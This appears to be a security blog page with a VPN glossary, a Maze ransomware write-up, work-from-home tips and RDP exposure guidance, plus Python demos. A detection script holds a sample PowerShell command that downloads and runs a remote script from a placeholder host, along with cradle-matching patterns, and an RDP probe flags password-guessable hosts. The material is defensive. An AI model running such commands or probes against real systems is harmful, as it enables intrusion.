VPN ! Terms that come up

An array of tech terms comes into the picture when the word VPN arises. Let's see them one by one.

A virtual private network is a way of connecting to the internet more securely or privately. Your traffic is sent through an encrypted tunnel to the VPN server, so the sites you visit see the server's IP address instead of your own, and your local network or ISP sees only encrypted traffic going to the VPN server. That makes it harder for those parties to track your online activity; it does not hide your activity from the VPN provider itself, which is why the terms below matter.

When deciding on a new VPN service, the following terms can help you navigate the field and understand what a provider offers.

Encryption
Using an algorithm (a cipher) and a secret key to encode data so that it looks like random, unreadable noise to anyone who does not hold the key. When your encrypted data reaches its destination, the same cipher with the matching key decrypts it. VPNs use several ciphers and key lengths, which vary in strength; AES-256 is the most common choice today.

Geo blocking
The practice of blocking access to online content, or restricting it to certain locations, based on the visitor's IP address. One measure of a consumer VPN's usefulness is its ability to get around the geo blocking of streaming services like Netflix and Hulu so you can access the content you've paid for no matter what country you travel to.

IP Count
The number of IP addresses a VPN provider has to hand out. A larger pool means fewer users share each address, which spreads the load and makes it less likely that an address ends up on a website's blocklist. Providers with a small pool tend to have more congested and more frequently blocked addresses.

Jurisdiction
The country in which a VPN provider is headquartered, and whose laws it must follow. This matters because local data-retention and surveillance laws, and any intelligence-sharing agreements that country is party to, determine what the provider can be compelled to log and hand over.

Kill switch
A must-have feature offered by most VPNs. If the VPN connection drops for any reason, the kill switch blocks all traffic that would otherwise leave over the normal, unprotected connection, so your real IP address and unencrypted data are not suddenly exposed to others.

Leak
When a VPN service fails in some way and exposes potentially identifying information or unencrypted user data to a website, to others on the network, or to the internet service provider. Reviewers such as CNET test VPNs for four kinds of leak: IPv4, IPv6 (traffic bypassing a tunnel that only carries IPv4), DNS (lookups going to the ISP's resolver instead of through the tunnel) and WebRTC (the browser revealing your real address to a site).

Logs
There are two kinds of logs a VPN provider might keep: connection logs (timestamps, how long you were connected, how much data you used and which addresses were assigned) and usage logs (the sites and services you actually accessed). A "no logs" claim often means no usage logs only, so check which kind the provider means.

Obfuscation
The act of making internet traffic passed through a VPN look like regular, non-VPN traffic. This is important in countries where VPN use is outlawed, but it is also key to reaching some streaming services and websites that block VPN traffic.

Perfect Forward Secrecy
A property of the key exchange rather than a separate cipher. With forward secrecy, each session's encryption key is derived from a fresh, ephemeral key exchange (typically Diffie-Hellman, either DHE or its elliptic-curve form ECDHE), and the private values are thrown away once the key is derived. A good VPN uses it so that if the provider's long-term key is ever stolen, recordings of past sessions still cannot be decrypted. It does not protect future sessions: an attacker holding the long-term key can impersonate the server from then on, which is why key rotation and revocation still matter.
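To make the property concrete, here is an added example (not code from the page or from any VPN product) that contrasts a server reusing one static Diffie-Hellman key with a server that uses a fresh ephemeral key per session and only signs it with its long-term key. The 61-bit prime is a toy so the numbers stay small, and HMAC stands in for a real signature; both are assumptions of the demo, not of any real protocol.

```python
"""Forward secrecy, shown as static vs. ephemeral Diffie-Hellman.

Added example for this page, not code from any VPN product. The 61-bit prime is a
toy so the numbers stay small; real deployments use 2048-bit+ MODP groups or
elliptic curves (X25519, P-256), where the discrete log is infeasible.
"""
import hashlib
import hmac
import secrets

P = 2**61 - 1  # toy prime modulus (demo only, see docstring)
G = 2


def keypair():
    """Fresh Diffie-Hellman private exponent and its public value g^x mod p."""
    priv = secrets.randbelow(P - 2) + 1
    return priv, pow(G, priv, P)


def transcript_of(*public_values):
    """Bytes that both sides (and an eavesdropper) see on the wire."""
    return b"|".join(v.to_bytes(8, "big") for v in public_values)


def session_key(shared_secret, transcript):
    """Derive a 256-bit session key from the DH result, bound to the transcript."""
    return hmac.new(transcript, shared_secret.to_bytes(8, "big"), hashlib.sha256).digest()


def sign(signing_key, data):
    """HMAC stands in for the server's real signature (RSA/ECDSA) in this demo."""
    return hmac.new(signing_key, data, hashlib.sha256).digest()


def verify(signing_key, signature, data):
    return hmac.compare_digest(signature, sign(signing_key, data))


# --- No forward secrecy: the server reuses one static DH key for every session -------
def static_handshake(server_priv, server_pub):
    """Returns (client_key, server_key, what an eavesdropper records)."""
    c, client_pub = keypair()
    t = transcript_of(client_pub, server_pub)
    client_key = session_key(pow(server_pub, c, P), t)
    server_key = session_key(pow(client_pub, server_priv, P), t)
    return client_key, server_key, {"client_pub": client_pub, "server_pub": server_pub}


def recover_static(recording, stolen_server_priv):
    """Whoever steals the static key later can recompute every recorded session's key."""
    t = transcript_of(recording["client_pub"], recording["server_pub"])
    return session_key(pow(recording["client_pub"], stolen_server_priv, P), t)


# --- Forward secrecy: ephemeral DH, the long-term key only authenticates -------------
def ephemeral_handshake(server_signing_key):
    c, client_pub = keypair()
    e, server_eph_pub = keypair()          # new exponent for this session only
    t = transcript_of(client_pub, server_eph_pub)
    sig = sign(server_signing_key, t)      # proves the ephemeral value came from the real server
    client_key = session_key(pow(server_eph_pub, c, P), t)
    server_key = session_key(pow(client_pub, e, P), t)
    # c and e are discarded here; the wire carries only public values and the signature,
    # so a later theft of server_signing_key yields no exponent to reuse against the recording.
    return client_key, server_key, {"client_pub": client_pub, "server_eph_pub": server_eph_pub, "sig": sig}


def forge_future_session(stolen_signing_key, client_pub):
    """What the stolen long-term key DOES allow: impersonating the server in new sessions."""
    _, attacker_pub = keypair()
    return attacker_pub, sign(stolen_signing_key, transcript_of(client_pub, attacker_pub))


if __name__ == "__main__":
    s_priv, s_pub = keypair()
    ck, sk, rec = static_handshake(s_priv, s_pub)
    print("static: attacker recovers recorded key:", recover_static(rec, s_priv) == ck)
    ltk = b"server long-term signing key"
    ck1, _, rec1 = ephemeral_handshake(ltk)
    ck2, _, _ = ephemeral_handshake(ltk)
    print("ephemeral: sessions use different keys:", ck1 != ck2)
    pub, sig = forge_future_session(ltk, rec1["client_pub"])
    print("but the stolen key forges future handshakes:",
          verify(ltk, sig, transcript_of(rec1["client_pub"], pub)))
```

The point of the two attacker functions is the boundary of the guarantee: with the static scheme the stolen key unlocks every recording; with the ephemeral scheme the recording holds nothing the stolen key can be applied to, yet the same stolen key still lets an attacker sign their own ephemeral value and stand in for the server in new sessions.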

Proxy Service
Often used to get around geo blocking, a proxy sits between you and the website you're trying to reach and forwards your requests, so the site sees the proxy's IP address instead of yours. Plain HTTP and SOCKS proxies usually add no encryption, so your ISP and anyone else on the network can still read the traffic.

Server count
The number of servers in a VPN's network. More servers in more locations usually means less congestion and an exit point closer to you, which translates into better speeds.

Split-tunneling
Sending only part of your traffic through the VPN tunnel while the rest goes straight out over your normal connection. Typically you choose which apps or destinations are tunnelled: for example, work applications go through the corporate VPN while video streaming or a printer on the home network uses the regular connection. The trade-off is that the excluded traffic gets none of the VPN's protection.

Tor
An abbreviation for The Onion Router, or the Tor network. Tor is designed to provide anonymity by wrapping your traffic in several layers of encryption and relaying it through a chain of volunteer-run servers called "nodes" or relays, so that no single relay knows both who you are and what you are accessing.

Maze ! How this creep gets the victim mazed

A small write-up on Maze, which has been in the spotlight recently. Traditional in form, but powerful compared to the others.

What is Maze?
Maze, also known as ChaCha, is ransomware that was first observed in May 2019. At first it was a fairly unremarkable strain used in run-of-the-mill extortion campaigns. Beginning around October 2019, Maze became more aggressive and more public.

Going further than almost any ransomware before it, in November 2019 the Maze operators began publicly outing their victims by posting the names of companies that had not paid the ransom. Campaigns delivering Maze have typically posed as legitimate government agencies and security vendors to get a foothold, then stolen and encrypted data in order to extort its owner.

Maze is one part of a multi-stage attack. Generally speaking, it appears in the second or third stage of these campaigns, after initial access has already been obtained, and is rarely the initial access technique itself.

What makes Maze different from other ransomware?

Maze’s functionality far exceeds the traditional approach of simply encrypting files and demanding payment for the key. It uses a 1-2-3 combination of:

Exfiltrate
Encrypt
Extort

When comparing Maze with most other ransomware, the clear difference is its ability to steal the data before encrypting it and then extort the victim with it. The end result is what has been described as a ransomware “double whammy”: whereas most ransomware merely encrypts the victim’s local data, Maze applies more pressure by threatening to leak sensitive data, so restoring from backups alone no longer lets a victim ignore the ransom demand.

This threat should be taken seriously: Trend Micro researchers have noted that groups using Maze have made good on it and released victims’ sensitive information on “name and shame” websites. In mid-December 2019 this leaking involved posting documents and raw databases belonging to victims who had not paid.

How does Maze work?
Ransomware only needs to get into a system to do its work, so gaining entry is far more than the proverbial “half the battle”; it is more like the battle itself.

Where most ransomware relies on social engineering and spam email campaigns to get into a targeted system, Maze has also been delivered through exploit kits via drive-by downloads. Exploit kits are bundles of exploits for known software vulnerabilities, packaged as an all-in-one tool that profiles a visiting browser and fires whichever exploit fits it.

One of the exploit kits used to deliver Maze is Fallout, which reuses various publicly available exploits, among them one for the Flash Player vulnerability CVE-2018-15982. Fallout is a relatively new kit whose distinguishing trait is that it uses PowerShell, rather than the browser process itself, to download and run its payload. Maze has also been observed being dropped by Spelevo, another exploit kit.
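The browser-exploit-then-PowerShell delivery described above leaves a recognisable trace in process-creation telemetry, so here is an added example of detection logic (not Maze samples or any vendor's rules) that scans Sysmon Event ID 1 style events for a browser parent spawning PowerShell with evasion switches and an encoded or in-memory download. The three events and the URL in them are constructed for the demo; the browser and host names are the obvious defaults and would be tuned to your environment.

```python
"""Spot a browser handing off to PowerShell with a download cradle.

Added example for this page (not Maze samples or vendor detections). It scans
process-creation events in Sysmon Event ID 1 style for the generic pattern that
browser-based exploit kits produce: a browser as parent, PowerShell as child,
evasion switches and an encoded or in-memory download. The three events below
are constructed for the demo.
"""
import base64
import re

BROWSERS = {"iexplore.exe", "chrome.exe", "firefox.exe", "msedge.exe", "opera.exe"}
PS_HOSTS = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}

# (regex over the lower-cased command line, finding label)
CRADLE_PATTERNS = [
    (r"downloadstring|downloadfile|downloaddata|invoke-webrequest|\biwr\b", "web download cradle"),
    (r"\biex\b|invoke-expression", "in-memory execution (IEX)"),
    (r"frombase64string", "embedded base64 payload"),
    (r"-nop\b|-noprofile|-w(?:indowstyle)?\s+hidden|-e(?:p|xecutionpolicy)\s+bypass", "evasion switches"),
]
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob (UTF-16LE script)
ENCODED_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand script, or None if there is none (or it is invalid)."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(event):
    """event: dict with ParentImage, Image, CommandLine. Returns a list of findings (empty = clean)."""
    findings = []
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    if image not in PS_HOSTS:
        return findings
    parent = event["ParentImage"].rsplit("\\", 1)[-1].lower()
    if parent in BROWSERS:
        findings.append(f"browser ({parent}) spawned {image}")
    text = event["CommandLine"]
    decoded = decode_encoded_command(text)
    if decoded is not None:
        findings.append("encoded command decoded")
        text = text + " " + decoded   # run the same rules over the decoded script
    lowered = text.lower()
    for pattern, label in CRADLE_PATTERNS:
        if re.search(pattern, lowered):
            findings.append(label)
    return findings


def triage(events):
    """Return only the events that produced findings, paired with those findings."""
    hits = []
    for event in events:
        findings = analyze(event)
        if findings:
            hits.append((event["CommandLine"], findings))
    return hits


# Constructed sample events (not real telemetry). The URL uses the reserved .invalid TLD.
STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"
ENCODED = base64.b64encode(STAGE2.encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": f"powershell.exe -nop -w hidden -enc {ENCODED}"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\scripts\rotate-logs.ps1"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe notes.txt"},
]

if __name__ == "__main__":
    for cmdline, findings in triage(SAMPLE_EVENTS):
        print(cmdline[:60], "->", findings)
```

Decoding the -EncodedCommand blob before matching is what keeps the rule from being trivially bypassed: the first sample's raw command line contains none of the cradle keywords, they only appear once the UTF-16LE script is recovered. The admin's scheduled script in the second event produces no findings, which is the false-positive check you want before deploying anything like this.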

In at least one case the Maze group did not immediately publish the stolen data itself, but instead posted a list of the leaked files and affected hosts to prove the breach had happened. Even that is highly unusual for a ransomware attack.
Stay home, stay safe

Conclusion
Ransomware has been around for a few years now, and we are starting to see strains that break the mould and forge a new direction. Maze differs from other ransomware in several significant ways, from its capabilities to the heart of the attack itself: gaining entry.

WFH ! Best Practices, Sweet and Short

WFH
  • Beware of Insecure Wi-Fi
  • Refresh Phishing Warnings and Employee Training
  • Limit Access to Games and Websites on Devices Used to Reach Employer Systems
  • Keep Track of Devices and Secure Physical Work Spaces
  • Prevent External Device Attachment
  • Formalize Work-From-Home
  • Prepare an Incident Response Plan
  • Encrypt Data and Tightly Control Access to the Encrypted Data
  • Deploy Secure Devices to Remote Employees
  • Enhance VPN Security, Password Strength, and Telephone/Video Conference Protection

RDP ! An alternative.

The coronavirus could make remote work the norm: what businesses need to know
Microsoft has warned of the risks of allowing remote access to desktop services while working from home, publishing guidance on how IT teams can keep working environments secure when faced with an increase in remote connections.

It said there has been an increase in the number of systems reachable via the traditional Remote Desktop Protocol (RDP) port and via a well-known “alternative” port used for RDP.

Although Remote Desktop Services (RDS) can be a fast way to enable remote access for employees, there are a number of security challenges that need to be considered.

The rapid outbreak of COVID-19 and the resulting lockdowns meant many businesses were unable to prepare for the demands remote working would place on IT teams and technical resources.

Ringold said that companies forced to quickly find a way of letting employees reach work networks may have relied on default RDP, potentially leaving corporate networks and applications exposed.

Research from the IoT search engine Shodan suggests that this led to an increase during March in the number of systems reachable on both the standard RDP port (TCP 3389) and the “alternate” port 3388, both of which attackers can find and attack fairly easily when exposed to the internet.

The risk is higher still when administrators are given remote access to on-premises systems, since their accounts carry much higher privileges that extend to the network and operating-system level.

According to Microsoft, several things should be considered when offering remote desktop access to employees: reviewing firewall policies to assess whether any systems are directly exposed to the public internet; controlling and logging remote access by employees; implementing multi-factor authentication; and assessing whether an attacker could move laterally through the corporate network once they gained access.

Ultimately, considerations for remote access should be weighed against businesses’ own cybersecurity resilience and risk appetite, Ringold said.

“Leveraging remote desktop services offers great flexibility by enabling remote workers to have an experience like that of working in the office, while offering some separation from threats on the endpoints.

“At the same time, those benefits should be weighed against the potential threats to the corporate infrastructure. Regardless of the remote access implementation your organization uses, it is imperative that you implement best practices around protecting identities and minimizing attack surface to ensure new risks are not introduced.”

To identify whether your company is using RDP, Microsoft said you should perform an audit and review of firewall policies and scan the internet-exposed address ranges and cloud services you use, to uncover any exposed systems. Firewall rules may be labelled “Remote Desktop” or “Terminal Services”. The default port for Remote Desktop Services is TCP 3389, but an alternate port such as TCP 3388 may be in use if the default configuration has been changed.
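A port scan tells you 3389 or 3388 is open, but not that it is RDP or how the server authenticates. As an added example (not Microsoft's or the article's code), the following speaks the first leg of the RDP handshake defined in MS-RDPBCGR: it sends an X.224 Connection Request carrying an RDP_NEG_REQ and parses the Connection Confirm's RDP_NEG_RSP or RDP_NEG_FAILURE to tell whether Network Level Authentication is in force. The server replies at the bottom are constructed byte strings so the parser runs offline; the `probe()` function needs network access and should only be pointed at hosts you are authorised to test.

```python
"""Confirm that an exposed port is really RDP and see what it negotiates.

Added example for this page, not Microsoft's or the article's code. It performs
the first leg of the RDP handshake from MS-RDPBCGR: an X.224 Connection Request
carrying RDP_NEG_REQ, answered by a Connection Confirm carrying RDP_NEG_RSP or
RDP_NEG_FAILURE. The sample responses at the bottom are constructed byte strings
so the parser can be exercised offline. Probe only hosts you are authorised to test.
"""
import socket
import struct

TYPE_NEG_REQ, TYPE_NEG_RSP, TYPE_NEG_FAILURE = 0x01, 0x02, 0x03
PROTOCOL_RDP, PROTOCOL_SSL, PROTOCOL_HYBRID, PROTOCOL_HYBRID_EX = 0x0, 0x1, 0x2, 0x8
HYBRID_REQUIRED_BY_SERVER = 0x5          # RDP_NEG_FAILURE code: server insists on NLA
DEFAULT_PORTS = (3389, 3388)              # default port and the "alternate" one from the article


def build_connection_request(requested=PROTOCOL_SSL | PROTOCOL_HYBRID):
    """TPKT + X.224 CR + RDP_NEG_REQ. Offering TLS and CredSSP lets the server pick its best."""
    neg_req = struct.pack("<BBHI", TYPE_NEG_REQ, 0, 8, requested)            # little-endian per spec
    x224_cr = struct.pack("!BBHHB", 6 + len(neg_req), 0xE0, 0, 0, 0)         # LI, CR code, DST/SRC-REF, class 0
    return struct.pack("!BBH", 3, 0, 4 + len(x224_cr) + len(neg_req)) + x224_cr + neg_req


def parse_connection_confirm(data):
    """Return {'rdp': bool, 'selected_protocol': int|None, 'failure': int|None, 'reason': str}."""
    result = {"rdp": False, "selected_protocol": None, "failure": None, "reason": ""}
    if len(data) < 11 or data[0] != 0x03 or data[1] != 0x00:
        result["reason"] = "no TPKT header"
        return result
    if struct.unpack("!H", data[2:4])[0] != len(data):
        result["reason"] = "TPKT length mismatch"
        return result
    li, code = data[4], data[5]
    if (code & 0xF0) != 0xD0:                      # X.224 Connection Confirm
        result["reason"] = "not an X.224 Connection Confirm"
        return result
    result["rdp"] = True
    if li == 6:                                   # bare CC, no negotiation block: legacy RDP security only
        result["selected_protocol"] = PROTOCOL_RDP
        return result
    if len(data) < 19:
        result.update(rdp=False, reason="truncated negotiation block")
        return result
    ntype, _flags, nlen, value = struct.unpack("<BBHI", data[11:19])
    if nlen != 8 or ntype not in (TYPE_NEG_RSP, TYPE_NEG_FAILURE):
        result.update(rdp=False, reason="unexpected negotiation block")
        return result
    if ntype == TYPE_NEG_RSP:
        result["selected_protocol"] = value
    else:
        result["failure"] = value
    return result


def assess(parsed):
    """Collapse the parse result into a label a scan report can sort on."""
    if not parsed["rdp"]:
        return "not-rdp"
    if parsed["failure"] == HYBRID_REQUIRED_BY_SERVER:
        return "nla-required"
    if parsed["failure"] is not None:
        return "negotiation-failure"
    if parsed["selected_protocol"] in (PROTOCOL_HYBRID, PROTOCOL_HYBRID_EX):
        return "nla"                 # credentials checked before a desktop session exists
    if parsed["selected_protocol"] == PROTOCOL_SSL:
        return "tls-no-nla"          # login screen reachable: password guessing works
    return "legacy-rdp-security"     # no TLS, weak legacy crypto


def probe(host, port, timeout=3.0):
    """Live check of one host:port; returns the assess() label (needs network access)."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            sock.sendall(build_connection_request())
            data = sock.recv(64)     # the whole 11- or 19-byte reply normally arrives at once
    except OSError:
        return "closed-or-filtered"
    return assess(parse_connection_confirm(data))


# Constructed server replies (hex; bytes.fromhex ignores the spaces).
SAMPLE_NLA = bytes.fromhex("03 00 00 13 0e d0 00 00 12 34 00 02 00 08 00 02 00 00 00")
SAMPLE_TLS_ONLY = bytes.fromhex("03 00 00 13 0e d0 00 00 12 34 00 02 00 08 00 01 00 00 00")
SAMPLE_LEGACY = bytes.fromhex("03 00 00 0b 06 d0 00 00 12 34 00")
SAMPLE_NLA_REQUIRED = bytes.fromhex("03 00 00 13 0e d0 00 00 12 34 00 03 00 08 00 05 00 00 00")
SAMPLE_HTTP = b"HTTP/1.1 400 Bad Request\r\n"

if __name__ == "__main__":
    for name, reply in [("nla", SAMPLE_NLA), ("tls", SAMPLE_TLS_ONLY), ("legacy", SAMPLE_LEGACY),
                        ("nla-req", SAMPLE_NLA_REQUIRED), ("http", SAMPLE_HTTP)]:
        print(name, "->", assess(parse_connection_confirm(reply)))
```

In an audit you would call `probe()` for each address in your exposed ranges and each port in `DEFAULT_PORTS`, then sort on the label: anything reporting `tls-no-nla` or `legacy-rdp-security` is an RDP login screen reachable by password guessing and is the first thing to pull behind the VPN or a gateway; `nla` or `nla-required` still means RDP is exposed, just with credentials checked before a session is created.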